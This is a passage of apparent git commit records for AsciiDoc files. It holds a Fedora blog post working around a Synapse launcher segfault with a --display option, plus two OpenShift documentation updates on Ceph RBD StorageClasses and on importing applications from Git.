When you start synapse from the application menu it launches with the options you desire.\n\n * append ` --display=:0` to the end of `Exec=synapse` in the file `\/usr\/share\/applications\/synapse.desktop`.\n * You WILL need **sudo** access to do this. *Be mindful of the space in the string you will be appending.*\n\n 2. If it's autostarted from your startup it is launched with the options you desire.\n * ensure you have **GNOME Tweak Tool** installed. *Install it using `sudo dnf install gnome-tweak-tool` or install it from the **Software** application*. \n * Then navigate: Tweak Tool>Startup Applications>\u2795. Search for Synapse then click \"Add\".\n\n 3. Navigate Settings>Keyboard>\u2795. Enter Name: \"Synapse\", Command: \"synapse --display=:0\", Shortcut: [Whatever keyboard shortcut you desire].\n \nThis should suffice as a solution until a patch is made.\n\n\n[footer]\nThis has been tested on fedora 25. Provide feedback as to whether it works on other distributions that are returning\n```\n[INFO 10:45:12.413170] [synapse-main:266] Starting up...\n[INFO 10:45:12.625883] [synapse-main:208] Binding activation to <Control>space\n[1] 27269 segmentation fault (core dumped) synapse\n```","old_contents":"= Fedora25: Synapse and Your Display Server\n:hp-tags: fedora, linux, synapse, launcher, solution, terminal, display, wayland, Xorg\n\n## The Problem\n\nOne of the tools I've constantly used when on a Linux distribution is https:\/\/launchpad.net\/synapse-project[Synapse]. It's a really fast application launcher. I've tried https:\/\/github.com\/ManuelSchneid3r\/albert[albert] and others but none have pleased me as much. Since I switched to Fedora25 back in December 2016, I've been using GNOME's built in search which resides in the dashboard. It suffices but the rendering required can cause it to be a bit laggy when resources are being hogged (especially by Chome \ud83d\ude22). So I've decided to install Synapse. Unfortunately after installing, it wouldn't launch from the application menu. I opened Terminix and typed `synapse` only to see it crash from a segmentation fault \ud83e\udd10. I decided to Google search the issue and came across these links:\n\n- https:\/\/ask.fedoraproject.org\/en\/question\/98598\/i-get-a-segmentation-fault-when-starting-synapse-on-fedora-25-what-to-do\/\n- https:\/\/www.reddit.com\/r\/Fedora\/comments\/5j31sd\/synapse_on_fedora_25_fails_with_segmentation\/\n- https:\/\/bugs.launchpad.net\/synapse-project\/+bug\/1592008\n\nUnfotunately everyone was complaining, but no solution.\n\n## The Solution\n\nI figured it was synapse trying to access memory or a stream that doesn't exist. So I checked `syanpse -h` to see what options are available. One of the options available to use `--display`. You can get synapse to successfully start by the following steps.\n\n 1. check the location of the displays you have available: `cd \/tmp\/.X11-unix && for x in X*; do echo \":${x#X}\"; done`\n 2. then, from the locations listed, try using any as arguments to the `--display` option.\n\nFor me, `synapse --display=:0` worked just fine.\n\n**NB: This allows you to manually launch synapse. However, you MAY want to ensure that:**\n\n 1. When you start synapse from the application menu it launches with the options you desire.\n\n * append ` --display=:0` to the end of `Exec=synapse` in the file `\/usr\/share\/applications\/synapse.desktop`.\n * You WILL need **sudo** access to do this. *Be mindful of the space in the string you will be appending.*\n\n 2. 
If it's autostarted from your startup it is launched with the options you desire.\n * ensure you have **GNOME Tweak Tool** installed. *Install it using `sudo dnf install gnome-tweak-tool` or install it from the **Software** application*. \n * Then navigate: Tweak Tool>Startup Applications>\u2795. Search for Synapse then click \"Add\".\n\n 3. Navigate Settings>Keyboard>\u2795. Enter Name: \"Synapse\", Command: \"synapse --display=:0\", Shortcut: [Whatever keyboard shortcut you desire].\n \nThis should suffice as a solution until a patch is made.\n\n\n[footer]\nThis has been tested on fedora 25. Provide feedback as to whether it works on other distributions that are returning\n```\n[INFO 10:45:12.413170] [synapse-main:266] Starting up...\n[INFO 10:45:12.625883] [synapse-main:208] Binding activation to <Control>space\n[1] 27269 segmentation fault (core dumped) synapse\n```","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8245db6c3a758c10e72cf8e7d4136bea164d70d7","subject":"Added Dynamic Provisioning for Ceph RBD","message":"Added Dynamic Provisioning for Ceph RBD\n\nDynamic provisioning for Ceph RBD was implemented in Kubernetes in PR: https:\/\/github.com\/kubernetes\/kubernetes\/pull\/31251\nSo it is also a part of OpenShift.\n\nThat's why the Ceph RBD dynamic provisioner documentation is added.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/dynamically_provisioning_pvs.adoc","new_file":"install_config\/persistent_storage\/dynamically_provisioning_pvs.adoc","new_contents":"[[install-config-persistent-storage-dynamically-provisioning-pvs]]\n= Dynamic Provisioning and Creating Storage Classes\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nThe *StorageClass* resource object is used to describe and classify storage that can be requested, as well as\nprovide a means for passing in parameters for *dynamically provisioned storage* on-demand. StorageClasses can also serve\nas a management mechanism for controlling different levels of storage and access to the storage. Cluster Administrators (cluster-admin)\nor Storage Administrators (storage-admin) need to define and create the StorageClasses that can then be requested by users without the users needing to have\nany intimate knowledge about the underlying storage volume sources.\n\nThe Kubernetes\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[persistent volume]\nframework enables this functionality and allows administrators to provision a cluster with persistent storage\nand gives users a way to request those resources without having any knowledge of\nthe underlying infrastructure.\n\nMany storage types are available for use as persistent volumes in\n{product-title}. 
While all of them can be statically provisioned by an\nadministrator, some types of storage can be created dynamically using the built in provider and plug-in APIs.\n\n\n[[available-dynamically-provisioned-plug-ins]]\n== Available Dynamically Provisioned Plug-ins\n\n{product-title} provides the following _provisioner plug-ins_, which have\ngeneric implementations for dynamic provisioning that use the cluster's\nconfigured provider's API to create new storage resources:\n\n\n[options=\"header\"]\n|===\n\n|Storage Type |Provisioner Plug-in Name |Required Configuration| Notes\n\n|OpenStack Cinder\n|`kubernetes.io\/cinder`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|AWS Elastic Block Store (EBS)\n|`kubernetes.io\/aws-ebs`\n|xref:..\/..\/install_config\/configuring_aws.adoc#install-config-configuring-aws[Configuring for AWS]\n|For dynamic provisioning when using multiple clusters in different zones, each\nnode must be tagged with `*Key=KubernetesCluster,Value=clusterid*`.\n\n|GCE Persistent Disk (gcePD)\n|`kubernetes.io\/gce-pd`\n|xref:..\/..\/install_config\/configuring_gce.adoc#install-config-configuring-gce[Configuring for GCE]\n|In multi-zone configurations, PVs must be created in the same region\/zone as\nthe master node. Do this by setting the\n`*failure-domain.beta.kubernetes.io\/region*` and\n`*failure-domain.beta.kubernetes.io\/zone*` PV labels to match the master node.\n\n|GlusterFS\n|`kubernetes.io\/glusterfs`\n|link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[Container Native Storage with GlusterFS]\n|Container Native Storage (CNS) utilizes heketi to manage Gluster Storage\n\n|Ceph RBD\n|`kubernetes.io\/rbd`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|===\n\n\n[IMPORTANT]\n====\nFor any chosen provisioner plug-ins, any relevant cloud, host or third-party configurations must also\nbe set up, per provider required documentation.\n====\n\n[[defining-storage-classes]]\n== Defining a StorageClass\n\nStorageClasses are currently a globally scoped object and need to be created by cluster-admins or\nstorage-admins.\nThere are currently five plug-ins that are supported. Below sections will\ndescribe the basic Spec definition for a _StorageClass_ and specific examples for each of the supported plug-in types.\n\n[[basic-spec-defintion]]\n=== Basic StorageClass Spec Definition\n\n.StorageClass Basic Spec Definition\n====\n[source,yaml]\n----\nkind: StorageClass <1>\napiVersion: storage.k8s.io\/v1beta1 <2>\nmetadata:\n name: foo <3>\n annotations: <4>\n ...\nprovisioner: kubernetes.io\/plug-in-type <5>\nparameters: <6>\n param1: value\n ...\n paramN: value\n\n----\n<1> (required) The API object type.\n<2> (required) The current apiVersion.\n<3> (required) The name of the StorageClass.\n<4> (optional) Annotations for the StorageClass\n<5> (required) The type of provisioner associated with this storage class.\n<6> (optional) The parameters required for the specific provisioner, this will change\nfrom plug-in to plug-in.\n====\n\n[[storage-class-annotations]]\n=== StorageClass Annotations\n\n- Setting a _StorageClass_ as the cluster wide default _StorageClass_. 
This will enable any Persistent Volume Claim (PVC)\nthat does not specify a specific storage class to automatically be provisioned via the _default_ StorageClass\n----\n storageclass.beta.kubernetes.io\/is-default-class: \"true\"\n----\n\n- Setting a _StorageClass_ description\n----\n kubernetes.io\/description: My StorageClass Description\n----\n\n\n[[openstack-cinder-spec]]\n=== OpenStack Cinder Spec\n\n.cinder-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: gold\nprovisioner: kubernetes.io\/cinder\nparameters:\n type: fast <1>\n availability: nova <2>\n\n----\n<1> VolumeType created in Cinder. Default is empty.\n<2> Availability Zone. Default is empty.\n====\n\n[[aws-elasticblockstore-ebs]]\n=== AWS ElasticBlockStore (EBS)\n\n.aws-ebs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/aws-ebs\nparameters:\n type: io1 <1>\n zone: us-east-1d <2>\n iopsPerGB: \"10\" <3>\n encrypted: true <4>\n kmsKeyId: keyvalue <5>\n\n----\n\n<1> io1, gp2, sc1, st1. See AWS docs for details. Default: gp2.\n<2> AWS zone. If not specified, a random zone from those where the Kubernetes cluster has a node is chosen.\n<3> Only for io1 volumes. I\/O operations per second per GiB. The AWS volume plug-in multiplies this by the size of the requested volume to compute the IOPS of the volume and caps it at 20 000 IOPS (the maximum supported by AWS, see AWS docs).\n<4> Denotes whether the EBS volume should be encrypted or not. Valid values are true or false.\n<5> (optional) The full Amazon Resource Name (ARN) of the key to use when encrypting the volume. If none is supplied but encrypted is true, a key is generated by AWS. link:http:\/\/docs.aws.amazon.com\/general\/latest\/gr\/aws-arns-and-namespaces.html[See AWS docs for valid ARN value].\n====\n\n[[gce-persistentdisk-gcePd]]\n=== GCE PersistentDisk (gcePD)\n\n.gce-pd-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/gce-pd\nparameters:\n type: pd-standard <1>\n zone: us-central1-a <2>\n\n----\n\n<1> pd-standard or pd-ssd. Default: pd-ssd\n<2> GCE zone. If not specified, a random zone in the same region as the controller-manager will be chosen.\n====\n\n[[glusterfs]]\n=== GlusterFS\n\n.glusterfs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/glusterfs\nparameters:\n endpoint: \"glusterfs-cluster\" <1>\n resturl: \"http:\/\/127.0.0.1:8081\" <2>\n restauthenabled: \"true\" <3>\n restuser: \"admin\" <4>\n restuserkey: \"password\" <5>\n\n----\n\n<1> glusterfs-cluster is the endpoint name, which includes the GlusterFS trusted pool IP addresses. This parameter is mandatory. We also need to create a service for this endpoint so that the endpoint will be persisted. This service can be without a selector, to tell Kubernetes that the endpoints will be added manually. Please note that the glusterfs plug-in looks for the endpoint in the pod namespace, so the endpoint and service must be created in the pod's namespace for a successful mount of gluster volumes in the pod.\n<2> The Gluster REST service\/Heketi service URL, which provisions gluster volumes on demand. The general format should be IPaddress:Port, and this is a mandatory parameter for the GlusterFS dynamic provisioner. 
If the Heketi service is exposed as a routable service in the OpenShift\/Kubernetes setup, it will have a resolvable fully qualified domain name and Heketi service URL. link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[For additional information and configuration]\n<3> The Gluster REST service\/Heketi user who has access to create volumes in the Gluster Trusted Pool.\n<4> The Gluster REST service\/Heketi user's password, which will be used for authentication to the REST server. This parameter is deprecated in favor of secretNamespace + secretName.\n<5> Identification of the Secret instance that contains the user password to use when talking to the Gluster REST service. These parameters are optional; an empty password will be used when both secretNamespace and secretName are omitted.\n====\n\n[[ceph-persistentdisk-cephRBD]]\n=== Ceph RBD\n\n.ceph-storageclass.yaml\n====\n[source,yaml]\n----\napiVersion: storage.k8s.io\/v1beta1\nkind: StorageClass\nmetadata:\n name: fast\nprovisioner: kubernetes.io\/rbd\nparameters:\n monitors: 10.16.153.105:6789 <1>\n adminId: kube <2>\n adminSecretName: ceph-secret <3>\n adminSecretNamespace: kube-system <4>\n pool: kube <5>\n userId: kube <6>\n userSecretName: ceph-secret-user <7>\n\n----\n\n<1> Ceph monitors, comma delimited. It is required.\n<2> Ceph client ID that is capable of creating images in the pool. Default is \"admin\".\n<3> Secret Name for `adminId`. It is required. The provided secret must have type \"kubernetes.io\/rbd\".\n<4> The namespace for `adminSecret`. Default is \"default\".\n<5> Ceph RBD pool. Default is \"rbd\".\n<6> Ceph client ID that is used to map the RBD image. Default is the same as `adminId`.\n<7> The name of the Ceph Secret for `userId` to map the RBD image. It must exist in the same namespace as the PVCs. It is required.\n====\n\n[[moreinfo]]\n== Additional Information and Examples\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_dynamic_provisioning.adoc#install-config-storage-examples-storage-classes-dynamic-provisioning[Examples and uses of StorageClasses for Dynamic Provisioning]\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_legacy.adoc#install-config-storage-examples-storage-classes-legacy[Examples and uses of StorageClasses without Dynamic Provisioning]\n","old_contents":"[[install-config-persistent-storage-dynamically-provisioning-pvs]]\n= Dynamic Provisioning and Creating Storage Classes\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nThe *StorageClass* resource object is used to describe and classify storage that can be requested, as well as\nprovide a means for passing in parameters for *dynamically provisioned storage* on-demand. StorageClasses can also serve\nas a management mechanism for controlling different levels of storage and access to the storage. 
Cluster Administrators (cluster-admin)\nor Storage Administrators (storage-admin) need to define and create the StorageClasses that can then be requested by users without the users needing to have\nany intimate knowledge about the underlying storage volume sources.\n\nThe Kubernetes\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[persistent volume]\nframework enables this functionality and allows administrators to provision a cluster with persistent storage\nand gives users a way to request those resources without having any knowledge of\nthe underlying infrastructure.\n\nMany storage types are available for use as persistent volumes in\n{product-title}. While all of them can be statically provisioned by an\nadministrator, some types of storage can be created dynamically using the built in provider and plug-in APIs.\n\n\n[[available-dynamically-provisioned-plug-ins]]\n== Available Dynamically Provisioned Plug-ins\n\n{product-title} provides the following _provisioner plug-ins_, which have\ngeneric implementations for dynamic provisioning that use the cluster's\nconfigured provider's API to create new storage resources:\n\n\n[options=\"header\"]\n|===\n\n|Storage Type |Provisioner Plug-in Name |Required Configuration| Notes\n\n|OpenStack Cinder\n|`kubernetes.io\/cinder`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|AWS Elastic Block Store (EBS)\n|`kubernetes.io\/aws-ebs`\n|xref:..\/..\/install_config\/configuring_aws.adoc#install-config-configuring-aws[Configuring for AWS]\n|For dynamic provisioning when using multiple clusters in different zones, each\nnode must be tagged with `*Key=KubernetesCluster,Value=clusterid*`.\n\n|GCE Persistent Disk (gcePD)\n|`kubernetes.io\/gce-pd`\n|xref:..\/..\/install_config\/configuring_gce.adoc#install-config-configuring-gce[Configuring for GCE]\n|In multi-zone configurations, PVs must be created in the same region\/zone as\nthe master node. Do this by setting the\n`*failure-domain.beta.kubernetes.io\/region*` and\n`*failure-domain.beta.kubernetes.io\/zone*` PV labels to match the master node.\n\n|GlusterFS\n|`kubernetes.io\/glusterfs`\n|link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[Container Native Storage with GlusterFS]\n|Container Native Storage (CNS) utilizes heketi to manage Gluster Storage\n\n|===\n\n\n[IMPORTANT]\n====\nFor any chosen provisioner plug-ins, any relevant cloud, host or third-party configurations must also\nbe set up, per provider required documentation.\n====\n\n[[defining-storage-classes]]\n== Defining a StorageClass\n\nStorageClasses are currently a globally scoped object and need to be created by cluster-admins or\nstorage-admins.\nThere are currently five plug-ins that are supported. 
Below sections will\ndescribe the basic Spec definition for a _StorageClass_ and specific examples for each of the supported plug-in types.\n\n[[basic-spec-defintion]]\n=== Basic StorageClass Spec Definition\n\n.StorageClass Basic Spec Definition\n====\n[source,yaml]\n----\nkind: StorageClass <1>\napiVersion: storage.k8s.io\/v1beta1 <2>\nmetadata:\n name: foo <3>\n annotations: <4>\n ...\nprovisioner: kubernetes.io\/plug-in-type <5>\nparameters: <6>\n param1: value\n ...\n paramN: value\n\n----\n<1> (required) The API object type.\n<2> (required) The current apiVersion.\n<3> (required) The name of the StorageClass.\n<4> (optional) Annotations for the StorageClass\n<5> (required) The type of provisioner associated with this storage class.\n<6> (optional) The parameters required for the specific provisioner, this will change\nfrom plug-in to plug-in.\n====\n\n[[storage-class-annotations]]\n=== StorageClass Annotations\n\n- Setting a _StorageClass_ as the cluster wide default _StorageClass_. This will enable any Persistent Volume Claim (PVC)\nthat does not specify a specific volume to automatically be provisioned via the _default_ StorageClass\n----\n storageclass.beta.kubernetes.io\/is-default-class: \"true\"\n----\n\n- Setting a _StorageClass_ description\n----\n kubernetes.io\/description: My StorgeClass Description\n----\n\n\n[[openstack-cinder-spec]]\n=== OpenStack Cinder Spec\n\n.cinder-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: gold\nprovisioner: kubernetes.io\/cinder\nparameters:\n type: fast <1>\n availability: nova <2>\n\n----\n<1> VolumeType created in Cinder. Default is empty.\n<2> Availability Zone. Default is empty.\n====\n\n[[aws-elasticblockstore-ebs]]\n=== AWS ElasticBlockStore (EBS)\n\n.aws-ebs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/aws-ebs\nparameters:\n type: io1 <1>\n zone: us-east-1d <2>\n iopsPerGB: \"10\" <3>\n encrypted: true <4>\n kmsKeyId: keyvalue <5>\n\n----\n\n<1> io1, gp2, sc1, st1. See AWS docs for details. Default: gp2.\n<2> AWS zone. If not specified, a random zone from those where Kubernetes cluster has a node is chosen.\n<3> only for io1 volumes. I\/O operations per second per GiB. AWS volume plug-in multiplies this with size of requested volume to compute IOPS of the volume and caps it at 20 000 IOPS (maximum supported by AWS, see AWS docs).\n<4> denotes whether the EBS volume should be encrypted or not. Valid values are true or false.\n<5> (optional) The full Amazon Resource Name (ARN) of the key to use when encrypting the volume. If none is supplied but encrypted is true, a key is generated by AWS. link:http:\/\/docs.aws.amazon.com\/general\/latest\/gr\/aws-arns-and-namespaces.html[See AWS docs for valid ARN value].\n====\n\n[[gce-persistentdisk-gcePd]]\n=== GCE PersistentDisk (gcePD)\n\n.gce-pd-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/gce-pd\nparameters:\n type: pd-standard <1>\n zone: us-central1-a <2>\n\n----\n\n<1> pd-standard or pd-ssd. Default: pd-ssd\n<2> GCE zone. 
If not specified, a random zone in the same region as controller-manager will be chosen.\n====\n\n[[glusterfs]]\n=== GlusterFS\n\n.glusterfs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/glusterfs\nparameters:\n endpoint: \"glusterfs-cluster\" <1>\n resturl: \"http:\/\/127.0.0.1:8081\" <2>\n restauthenabled: \"true\" <3>\n restuser: \"admin\" <4>\n restuserkey: \"password\" <5>\n\n----\n\n<1> glusterfs-cluster is the endpoint name which includes GlusterFS trusted pool IP addresses. This parameter is mandatory. We need to also create a service for this endpoint, so that the endpoint will be persisted. This service can be without a selector to tell Kubernetes that the endpoints will be added manually. Please note that, glusterfs plug-in looks for the endpoint in the pod namespace, so it is mandatory that the endpoint and service have to be created in Pod's namespace for successful mount of gluster volumes in the pod.\n<2> Gluster REST service\/Heketi service url which provision gluster volumes on demand. The general format should be IPaddress:Port and this is a mandatory parameter for GlusterFS dynamic provisioner. If Heketi service is exposed as a routable service in openshift\/kubernetes setup, it will have a resolvable fully qualified domain name and heketi service url. link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[For additional information and configuration]\n<3> Gluster REST service\/Heketi user who has access to create volumes in the Gluster Trusted Pool.\n<4> Gluster REST service\/Heketi user's password which will be used for authentication to the REST server. This parameter is deprecated in favor of secretNamespace + secretName.\n<5> Identification of Secret instance that containes user password to use when talking to Gluster REST service. 
These parameters are optional, empty password will be used when both secretNamespace and secretName are omitted.\n====\n\n[[moreinfo]]\n== Additional Information and Examples\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_dynamic_provisioning.adoc#install-config-storage-examples-storage-classes-dynamic-provisioning[Examples and uses of StorageClasses for Dynamic Provisioning]\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_legacy.adoc#install-config-storage-examples-storage-classes-legacy[Examples and uses of StorageClasses without Dynamic Provisioning]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd8e38ef53766e2a94934179e9dfa007cb80609a","subject":"RHDEVDOCS-3619: Update the creating applications flow as per the latest UI changes","message":"RHDEVDOCS-3619: Update the creating applications flow as per the latest UI changes\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/odc-importing-codebase-from-git-to-create-application.adoc","new_file":"modules\/odc-importing-codebase-from-git-to-create-application.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * applications\/creating_applications\/odc-creating-applications-using-developer-perspective.adoc\n\n:_content-type: PROCEDURE\n[id=\"odc-importing-codebase-from-git-to-create-application_{context}\"]\n= Importing a codebase from Git to create an application\n\nYou can use the *Developer* perspective to create, build, and deploy an application on {product-title} using an existing codebase in GitHub.\n\nThe following procedure walks you through the *From Git* option in the *Developer* perspective to create an application.\n\n.Procedure\n\n. In the *+Add* view, click *From Git* in the *Git Repository* tile to see the *Import from git* form.\n. In the *Git* section, enter the Git repository URL for the codebase you want to use to create an application. For example, enter the URL of this sample Node.js application `\\https:\/\/github.com\/sclorg\/nodejs-ex`. The URL is then validated.\n. Optional: You can click *Show Advanced Git Options* to add details such as:\n\n* *Git Reference* to point to code in a specific branch, tag, or commit to be used to build the application.\n* *Context Dir* to specify the subdirectory for the application source code you want to use to build the application.\n* *Source Secret* to create a *Secret Name* with credentials for pulling your source code from a private repository.\n\n. Optional: You can import a devfile, a Dockerfile, or a builder image through your Git repository to further customize your deployment.\n* If your Git repository contains a devfile, a Dockerfile, or a builder image, it is automatically detected and populated on the respective path fields. If a devfile, a Dockerfile, and a builder image are detected in the same repository, the devfile is selected by default.\n* To edit the file import type and select a different strategy, click *Edit import strategy* option.\n* If multiple devfiles, Dockerfiles, or builder images are detected, to import a specific devfile, Dockerfile, or a builder image, specify the respective paths relative to the context directory.\n\n. After the Git URL is validated, the recommended builder image is selected and marked with a star. If the builder image is not auto-detected, select a builder image. 
For the `https:\/\/github.com\/sclorg\/nodejs-ex` Git URL, by default the Node.js builder image is selected.\n.. Optional: Use the *Builder Image Version* drop-down to specify a version.\n.. Optional: Use the *Edit import strategy* to select a different strategy.\n.. Optional: For the Node.js builder image, use the **Run command** field to override the command to run the application.\n\n. In the *General* section:\n.. In the *Application* field, enter a unique name for the application grouping, for example, `myapp`. Ensure that the application name is unique in a namespace.\n.. The *Name* field to identify the resources created for this application is automatically populated based on the Git repository URL if there are no existing applications. If there are existing applications, you can choose to deploy the component within an existing application, create a new application, or keep the component unassigned.\n+\n[NOTE]\n====\nThe resource name must be unique in a namespace. Modify the resource name if you get an error.\n====\n\n. In the *Resources* section, select:\n\n* *Deployment*, to create an application in plain Kubernetes style.\n* *Deployment Config*, to create an {product-title} style application.\n* *Serverless Deployment*, to create a Knative service.\n+\n[NOTE]\n====\nThe *Serverless Deployment* option is displayed in the *Import from git* form only if the {ServerlessOperatorName} is installed in your cluster. For further details, refer to the {ServerlessProductName} documentation.\n====\n\n. In the *Pipelines* section, select *Add Pipeline*, and then click *Show Pipeline Visualization* to see the pipeline for the application.\n\n. Optional: In the *Advanced Options* section, the *Target port* and the *Create a route to the application* is selected by default so that you can access your application using a publicly available URL.\n+\nIf your application does not expose its data on the default public port, 80, clear the check box, and set the target port number you want to expose.\n\n. Optional: You can use the following advanced options to further customize your application:\n\ninclude::snippets\/routing-odc.adoc[]\ninclude::snippets\/serverless-domain-mapping-odc.adoc[]\n\nHealth Checks::\nClick the *Health Checks* link to add Readiness, Liveness, and Startup probes to your application. All the probes have prepopulated default data; you can add the probes with the default data or customize it as required.\n+\nTo customize the health probes:\n+\n* Click *Add Readiness Probe*, if required, modify the parameters to check if the container is ready to handle requests, and select the check mark to add the probe.\n* Click *Add Liveness Probe*, if required, modify the parameters to check if a container is still running, and select the check mark to add the probe.\n* Click *Add Startup Probe*, if required, modify the parameters to check if the application within the container has started, and select the check mark to add the probe.\n+\nFor each of the probes, you can specify the request type - *HTTP GET*, *Container Command*, or *TCP Socket*, from the drop-down list. The form changes as per the selected request type. 
You can then modify the default values for the other parameters, such as the success and failure thresholds for the probe, number of seconds before performing the first probe after the container starts, frequency of the probe, and the timeout value.\n\nBuild Configuration and Deployment::\nClick the *Build Configuration* and *Deployment* links to see the respective configuration options. Some options are selected by default; you can customize them further by adding the necessary triggers and environment variables.\n+\nFor serverless applications, the *Deployment* option is not displayed as the Knative configuration resource maintains the desired state for your deployment instead of a `DeploymentConfig` resource.\n\ninclude::snippets\/scaling-odc.adoc[]\n\nResource Limit::\nClick the *Resource Limit* link to set the amount of *CPU* and *Memory* resources a container is guaranteed or allowed to use when running.\n\nLabels::\nClick the *Labels* link to add custom labels to your application.\n\n. Click *Create* to create the application and a success notification is displayed. You can see the build status of the application in the *Topology* view.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * applications\/creating_applications\/odc-creating-applications-using-developer-perspective.adoc\n\n:_content-type: PROCEDURE\n[id=\"odc-importing-codebase-from-git-to-create-application_{context}\"]\n= Importing a codebase from Git to create an application\n\nYou can use the *Developer* perspective to create, build, and deploy an application on {product-title} using an existing codebase in GitHub.\n\nThe following procedure walks you through the *From Git* option in the *Developer* perspective to create an application.\n\n.Procedure\n\n. In the *+Add* view, click *From Git* in the *Git Repository* tile to see the *Import from git* form.\n. In the *Git* section, enter the Git repository URL for the codebase you want to use to create an application. For example, enter the URL of this sample Node.js application `\\https:\/\/github.com\/sclorg\/nodejs-ex`. The URL is then validated.\n. Optional: You can click *Show Advanced Git Options* to add details such as:\n\n* *Git Reference* to point to code in a specific branch, tag, or commit to be used to build the application.\n* *Context Dir* to specify the subdirectory for the application source code you want to use to build the application.\n* *Source Secret* to create a *Secret Name* with credentials for pulling your source code from a private repository.\n\n. Optional: You can import a devfile, a Dockerfile, or a builder image through your Git repository to further customize your deployment.\n* If your Git repository contains a devfile, a Dockerfile, or a builder image, it is automatically detected and populated on the respective path fields. If a devfile, a Dockerfile, and a builder image are detected in the same repository, the devfile is selected by default.\n* To edit the file import type and select a different strategy, click *Edit import strategy* option.\n* If multiple devfiles, Dockerfiles, or builder images are detected, to import a specific devfile, Dockerfile, or a builder image, specify the respective paths relative to the context directory.\n\n. After the Git URL is validated, the recommended builder image is selected and marked with a star. If the builder image is not auto-detected, select a builder image. 
For the `https:\/\/github.com\/sclorg\/nodejs-ex` Git URL, by default the Node.js builder image is selected.\n.. Optional: Use the *Builder Image Version* drop-down to specify a version.\n.. Optional: Use the *Edit import strategy* to select a different strategy.\n\n. In the *General* section:\n.. In the *Application* field, enter a unique name for the application grouping, for example, `myapp`. Ensure that the application name is unique in a namespace.\n.. The *Name* field to identify the resources created for this application is automatically populated based on the Git repository URL if there are no existing applications. If there are existing applications, you can choose to deploy the component within an existing application, create a new application, or keep the component unassigned.\n+\n[NOTE]\n====\nThe resource name must be unique in a namespace. Modify the resource name if you get an error.\n====\n\n. In the *Resources* section, select:\n\n* *Deployment*, to create an application in plain Kubernetes style.\n* *Deployment Config*, to create an {product-title} style application.\n* *Serverless Deployment*, to create a Knative service.\n+\n[NOTE]\n====\nThe *Serverless Deployment* option is displayed in the *Import from git* form only if the {ServerlessOperatorName} is installed in your cluster. For further details, refer to the {ServerlessProductName} documentation.\n====\n\n. In the *Pipelines* section, select *Add Pipeline*, and then click *Show Pipeline Visualization* to see the pipeline for the application.\n\n. In the *Advanced Options* section, the *Create a route to the application* is selected by default so that you can access your application using a publicly available URL. You can clear the check box if you do not want to expose your application on a public route.\n\n. Optional: You can use the following advanced options to further customize your application:\n\ninclude::snippets\/routing-odc.adoc[]\ninclude::snippets\/serverless-domain-mapping-odc.adoc[]\n\nHealth Checks::\nClick the *Health Checks* link to add Readiness, Liveness, and Startup probes to your application. All the probes have prepopulated default data; you can add the probes with the default data or customize it as required.\n+\nTo customize the health probes:\n+\n* Click *Add Readiness Probe*, if required, modify the parameters to check if the container is ready to handle requests, and select the check mark to add the probe.\n* Click *Add Liveness Probe*, if required, modify the parameters to check if a container is still running, and select the check mark to add the probe.\n* Click *Add Startup Probe*, if required, modify the parameters to check if the application within the container has started, and select the check mark to add the probe.\n+\nFor each of the probes, you can specify the request type - *HTTP GET*, *Container Command*, or *TCP Socket*, from the drop-down list. The form changes as per the selected request type. You can then modify the 